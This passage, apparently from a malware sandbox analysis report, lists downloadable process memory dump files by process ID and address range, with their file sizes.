656KB

Download
memory/3424-836-0x0000000007030000-0x000000000703A000-memory.dmp

Filesize
40KB

Download
memory/3424-789-0x0000000006C70000-0x0000000006CA4000-memory.dmp

Filesize
208KB

Download
memory/3504-60-0x0000000000F90000-0x0000000000FE2000-memory.dmp

Filesize
328KB

Download
memory/3504-216-0x00000000072C0000-0x0000000007326000-memory.dmp

Filesize
408KB

Download
memory/3504-96-0x0000000006C90000-0x0000000006CAE000-memory.dmp

Filesize
120KB

Download
memory/3504-224-0x0000000007C30000-0x0000000007C80000-memory.dmp

Filesize
320KB

Download
memory/3504-94-0x00000000064C0000-0x0000000006536000-memory.dmp

Filesize
472KB

Download
memory/3504-317-0x0000000008250000-0x0000000008412000-memory.dmp

Filesize
1.8MB

Download
memory/3504-318-0x0000000009060000-0x000000000958C000-memory.dmp

Filesize
5.2MB

Download
memory/3504-73-0x0000000005B10000-0x0000000005B1A000-memory.dmp

Filesize
40KB

Download
memory/3504-62-0x0000000005960000-0x00000000059F2000-memory.dmp

Filesize
584KB

Download
memory/3504-107-0x0000000007170000-0x00000000071BC000-memory.dmp

Filesize
304KB

Download
memory/3504-106-0x0000000007000000-0x000000000703C000-memory.dmp

Filesize
240KB

Download
memory/3504-105-0x0000000006FA0000-0x0000000006FB2000-memory.dmp

Filesize
72KB

Download
memory/3504-61-0x0000000005E10000-0x00000000063B6000-memory.dmp

Filesize
5.6MB

Download
memory/3504-102-0x0000000007510000-0x0000000007B28000-memory.dmp

Filesize
6.1MB

Download
memory/3504-104-0x0000000007060000-0x000000000716A000-memory.dmp

Filesize
1.0MB

Download
memory/3588-918-0x0000021201E20000-0x0000021201E2C000-memory.dmp

Filesize
48KB

Download
memory/3588-917-0x00000212004D0000-0x00000212004E0000-memory.dmp

Filesize
64KB

Download
memory/3588-930-0x000002121AB40000-0x000002121AE40000-memory.dmp

Filesize
3.0MB

Download
memory/3588-926-0x0000021201DE0000-0x0000021201DEA000-memory.dmp

Filesize
40KB

Download
memory/3588-924-0x0000021281CA0000-0x0000021281CF0000-memory.dmp

Filesize
320KB

Download
memory/3588-925-0x000002121AB10000-0x000002121AB3A000-memory.dmp

Filesize
168KB

Download
memory/3588-923-0x000002121AA60000-0x000002121AB12000-memory.dmp

Filesize
712KB

Download
memory/3588-915-0x000002127E410000-0x0000021281C44000-memory.dmp

Filesize
56.2MB

Download
memory/3588-922-0x000002121A890000-0x000002121A89A000-memory.dmp

Filesize
40KB

Download
memory/3588-919-0x0000021201E00000-0x0000021201E14000-memory.dmp

Filesize
80KB

Download
memory/3588-920-0x000002121A870000-0x000002121A894000-memory.dmp

Filesize
144KB

Download
memory/3588-916-0x000002121A760000-0x000002121A86A000-memory.dmp

Filesize
1.0MB

Download
memory/3628-456-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/3728-242-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/3728-222-0x0000000000400000-0x000000000063B000-memory.dmp

Filesize
2.2MB

Download
memory/3728-583-0x0000000140000000-0x00000001403BD000-memory.dmp

Filesize
3.7MB

Download
memory/3728-220-0x0000000000400000-0x000000000063B000-memory.dmp

Filesize
2.2MB

Download
memory/3728-521-0x0000000140000000-0x00000001403BD000-memory.dmp

Filesize
3.7MB

Download
memory/3924-651-0x0000000000400000-0x000000000259D000-memory.dmp

Filesize
33.6MB

Download
memory/3952-814-0x000000006E430000-0x000000006E787000-memory.dmp

Filesize
3.3MB

Download
memory/3952-803-0x000000006F200000-0x000000006F24C000-memory.dmp

Filesize
304KB

Download
memory/3952-788-0x0000000007540000-0x0000000007586000-memory.dmp

Filesize
280KB

Download
memory/3952-787-0x0000000006940000-0x000000000698C000-memory.dmp

Filesize
304KB

Download
memory/3952-848-0x0000000007AA0000-0x0000000007ABA000-memory.dmp

Filesize
104KB

Download
memory/3952-857-0x0000000007AC0000-0x0000000007AC8000-memory.dmp

Filesize
32KB

Download
memory/3952-845-0x00000000079F0000-0x0000000007A01000-memory.dmp

Filesize
68KB

Download
memory/4120-315-0x0000000000E10000-0x0000000000E11000-memory.dmp

Filesize
4KB

Download
memory/4128-363-0x0000021EDD610000-0x0000021EDD630000-memory.dmp

Filesize
128KB

Download
memory/4344-511-0x0000000000450000-0x0000000000697000-memory.dmp

Filesize
2.3MB

Download
memory/4344-512-0x0000000000450000-0x0000000000697000-memory.dmp

Filesize
2.3MB

Download
memory/4344-510-0x0000000000450000-0x0000000000697000-memory.dmp

Filesize
2.3MB

Download
memory/4344-509-0x0000000000450000-0x0000000000697000-memory.dmp

Filesize
2.3MB

Download
memory/4344-508-0x0000000000450000-0x0000000000697000-memory.dmp

Filesize
2.3MB

Download
memory/4736-316-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/4736-314-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/4812-38-0x0000000000400000-0x0000000000592000-memory.dmp

Filesize
1.6MB

Download
memory/4908-260-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-18-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-19-0x0000000000C81000-0x0000000000CAF000-memory.dmp

Filesize
184KB

Download
memory/4908-20-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-454-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-412-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-411-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-410-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-409-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-21-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-346-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-582-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/4908-532-0x0000000000C80000-0x0000000001123000-memory.dmp

Filesize
4.6MB

Download
memory/5040-72-0x0000000000080000-0x0000000000140000-memory.dmp

Filesize
768KB

Download
memory/5040-233-0x000000001E600000-0x000000001EB28000-memory.dmp

Filesize
5.2MB

Download
memory/5040-214-0x000000001BE60000-0x000000001BE72000-memory.dmp

Filesize
72KB

Download
memory/5040-213-0x000000001D3A0000-0x000000001D4AA000-memory.dmp

Filesize
1.0MB

Download
memory/5040-232-0x000000001DF00000-0x000000001E0C2000-memory.dmp

Filesize
1.8MB

Download
memory/5040-225-0x000000001BEA0000-0x000000001BEBE000-memory.dmp

Filesize
120KB

Download
memory/5040-223-0x000000001D9B0000-0x000000001DA26000-memory.dmp

Filesize
472KB

Download
memory/5040-215-0x000000001D290000-0x000000001D2CC000-memory.dmp

Filesize
240KB

Download
memory/5180-732-0x00000000004F0000-0x0000000000B5E000-memory.dmp

Filesize
6.4MB

Download
memory/5456-825-0x000000006F200000-0x000000006F24C000-memory.dmp

Filesize
304KB

Download
memory/5456-826-0x000000006E430000-0x000000006E787000-memory.dmp

Filesize
3.3MB

Download
memory/5496-846-0x0000000007A90000-0x0000000007A9E000-memory.dmp

Filesize
56KB

Download
memory/5496-804-0x000000006E430000-0x000000006E787000-memory.dmp

Filesize
3.3MB

Download
memory/5496-791-0x000000006F200000-0x000000006F24C000-memory.dmp

Filesize
304KB

Download
memory/5496-847-0x0000000007AA0000-0x0000000007AB5000-memory.dmp

Filesize
84KB

Download
memory/5600-700-0x0000000005BE0000-0x0000000005F37000-memory.dmp

Filesize
3.3MB

Download
memory/5600-713-0x00000000067D0000-0x000000000681C000-memory.dmp

Filesize
304KB

Download
memory/5872-768-0x00000000004F0000-0x0000000000B5E000-memory.dmp

Filesize
6.4MB

Download